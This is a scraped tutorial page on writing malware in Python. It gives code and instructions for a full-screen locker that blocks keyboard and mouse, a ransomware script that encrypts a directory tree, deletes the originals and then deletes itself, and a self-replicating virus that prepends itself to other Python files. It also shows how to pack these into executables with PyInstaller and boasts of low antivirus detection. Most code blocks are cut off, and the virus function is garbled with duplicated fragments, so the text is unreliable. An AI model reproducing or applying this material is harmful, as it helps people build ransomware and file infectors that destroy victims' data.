Writing a virus in python
Why would anyone want to write malware in Python? We’ll do this to learn the general principles of malware development, and at the same time you will practice using this language and be able to apply the knowledge gained for other purposes. In addition, Python malware does come across in the wild, and not all antiviruses pay attention to it.
Most often, Python is used to create backdoors in software in order to download and execute any code on an infected machine. So, in 2017, employees of the Dr.Web company discovered Python.BackDoor.33, and on May 8, 2019, Mac.BackDoor.Siggen.20 was spotted. Another Trojan, RAT Python, stole user data from infected devices and used Telegram as a data transfer channel.
We will create three demo programs: a locker that will block access to the computer until the user enters the correct password, an encryptor that will bypass directories and encrypt all files in them, and a virus that will distribute its code, infecting other programs. in Python.
INFO
The topic of remote administration of infected machines is beyond the scope of this article, but you can get a basic code base with all the explanations in the article “ Reverse shell in Python “.
Despite the fact that our creations do not claim to be of any high technical level, they can be dangerous under certain conditions. Therefore, I warn you that severe punishment may follow for disrupting other people’s computers and destroying information. Let’s agree right away: you will only run everything that we describe here on your own machine, and even then be careful not to accidentally encrypt the entire disk for yourself.
All information is provided for informational purposes only. Neither the author nor the editors are responsible for any possible harm caused by the materials of this article
Setting up the environment
So, first of all, of course, we need Python itself, and the third version. I will not describe in detail how to install it, but I will immediately send you to download the free book “Python Bite” ( PDF ). In it you will find the answer to this and many other Python-related questions.
Additionally, we will install several modules that we will use:
pip install pyAesCryptThis completes the preparatory stage, you can start writing the code.
Locker
The idea is to create a full screen window and prevent the user from closing it.
Importing libraries:
import pyautoguiNow let’s get down to the main part of the program.
# Create a windowHere pyautogui.FAILSAFE = False is the protection that is activated when you move the cursor to the upper left corner of the screen. When it is triggered, the program is closed. We do not need this, so we disable this function.
To make our locker work on any monitor with any resolution, we read the width and height of the screen and, using a simple formula, calculate where the cursor will go, click, and so on. In our case, the cursor hits the center of the screen, that is, we divide the width and height by two. We will sleepadd a pause () so that the user can enter the code to cancel.
Now we have not blocked the input of text, but you can do it, and then the user will not get rid of us in any way. To do this, we will write some more code. I do not advise you to do it right away. First, let’s configure the program so that it turns off when you enter a password. But the code for blocking the keyboard and mouse looks like this:
import pythoncom, pyHookLet’s create a function for entering the key:
def callback (event):Everything is simple here. If the key is not the one we specified, the program continues to run. If the passwords match, we slow down.
The last function that is needed for the pest window to work:
def on_closing ():At this point, our impromptu locker is ready.
Cryptographer
We will write this virus using only one third-party library — pyAesCrypt. The idea is to encrypt all files in the specified directory and all directories below. This is an important limitation to avoid breaking the operating system. For work, we will create two files — an encryptor and a decryptor. After work, the executable files will self-delete.
First, we request the path to the attacked directory and the password for encryption and decryption:
direct = input ("Write the attacked directory:")Next, we will generate scripts for encryption and decryption. It looks like this:
with open ("Crypt.py", "w") as crypt:Moving on to the files that we will use as templates. Let’s start with the encoder. We need two standard libraries:
import osWe write the encryption function (all according to the pyAesCrypt manual):
def crypt (file):Instead of str (password), the script generator will insert the password.
Important nuances. We will encrypt and decrypt using a buffer, thus we get rid of the limitation on the file size (at least, we will significantly reduce this limitation). The call is os.remove(file) needed to delete the original file, since we copy the file and encrypt the copy. You can choose to copy the file instead of deleting it.
Now a function that bypasses folders. Nothing complicated here either.
def walk (dir):Let’s add two more lines at the end. One for starting a bypass, the second for self-destructing the program.
walk ("'' '+ str (direct) +' ''")The desired path will be substituted here again.
Here is the entire source.
import osNow the “mirrored” file. If in the ransomware we wrote encrypt, then in the decryptor we write decrypt. There is no point in repeating the parsing of the same lines, so the final version is right away.
import osA total of 29 lines, of which it took three to decipher. In case one of the files suddenly turns out to be damaged and an error occurs, we use the exception catch ( try...except). That is, if we fail to decrypt the file, we just skip it.
Virus
The idea here is to create a program that will infect other programs with the specified extension. Unlike real viruses that infect any executable file, ours will only infect other Python programs.
This time we don’t need any third-party libraries, only the sys and os modules are needed. We connect them.
import sysLet’s create three functions: message, parser, infection.
The function that reports the attack:
def code (void):Let’s call it right away to understand that the program has worked:
code (None)Directory traversal is similar to what we did in the ransomware.
def walk (dir):In theory, we could poison the sources in other languages in the same way, adding the code in these languages to the files with the appropriate extensions. And on Unix-like systems, scripts in Bash, Ruby, Perl and the like can simply be replaced with Python scripts by correcting the path to the interpreter in the first line.
The virus will infect files “down” from the directory where it is located (we get the path by calling os.getcwd()).
At the beginning and at the end of the file, we write the following comments:
# START #I’ll explain why a little later.
Next is the function that is responsible for self-replication.
def virus (python): begin = "# START # \ n" end = "# STOP # \ n" # Read the attacked file, let's name it copy with open (sys.argv [0], "r") as copy : # Create a flag k = 0 # Create a variable for the virus code and add an empty line virus_code = "\ n" # Go through the infected file line by line for line in copy: # If we find a start marker, raise the flag if line == begin: k = 1 # Add marker into the infected code virus_code + = begin # If we went through the beginning, but did not reach the end, copy the line elif k == 1 and line! = end: virus_code + = line # If we reached the end, add the final marker and exit the loop elif line == end: virus_code + = end break else: pass # Read the infected file again with open (python, "r" ) as file:# Create a variable for the source code original_code = "" # Copy the infected code line by line for line in file: original_code + = line # If we find the virus start marker, stop and raise the vir flag if line == begin: vir = True break # If there is no marker, omit the vir flag else: vir = False # If the vir flag is omitted, write the virus and the source code to the file if not vir: with open (python, "w" ) as paste: paste.write (virus_code + "\ n \ n" + original_code) else: passpasswrite the virus and the source code to the file if not vir: with open (python, "w") as paste: paste.write (virus_code + "\ n \ n" + original_code) else: passpasswrite the virus and the source code to the file if not vir: with open (python, "w") as paste: paste.write (virus_code + "\ n \ n "+ original_code) else: passpassNow, I think, it became clearer why we need “start” and “stop” labels. They mark the beginning and end of the virus code. First, we read the file and go through it line by line. When we come across the starting mark, we raise the flag. Add an empty line so that the virus in the source code starts on a new line. We read the file a second time and write the source code line by line. The last step is to write a virus, two indents and the original code. You can mock and write it in some special way — for example, modify all output lines.
Making an executable file
How to run a virus written in a scripting language on a victim’s machine? There are two ways: either to somehow make sure that the interpreter is installed there, or to pack our creation along with everything you need into a single executable file. The PyInstaller utility serves this purpose. Here’s how to use it.
Install
pip install PyInstallerAnd enter the command
PyInstaller "filename.py" --onefile --noconsoleWe wait a bit, and a bunch of files appear in the program folder. You can safely get rid of everything except executables, they will be in the dist folder.
It is said that ever since malware in Python began to appear, antiviruses have become extremely nervous about PyInstaller, even if it comes with a perfectly safe program.
Conclusion
So, we wrote three malicious programs using a scripting language and packaged them using PyInstaller.
Of course, our virus is not the scariest one in the world, and the locker and ransomware still need to somehow be delivered to the victim’s car. At the same time, none of our programs communicate with the C & C server and I have not obfuscated the code at all, so there is still a huge scope for creativity.
Nevertheless, the level of detection by antiviruses turned out to be surprisingly low. It turns out that even the simplest self-written malware can become a threat. So antiviruses are antiviruses, but it will always be unsafe to download random programs from the Internet and run them without thinking.
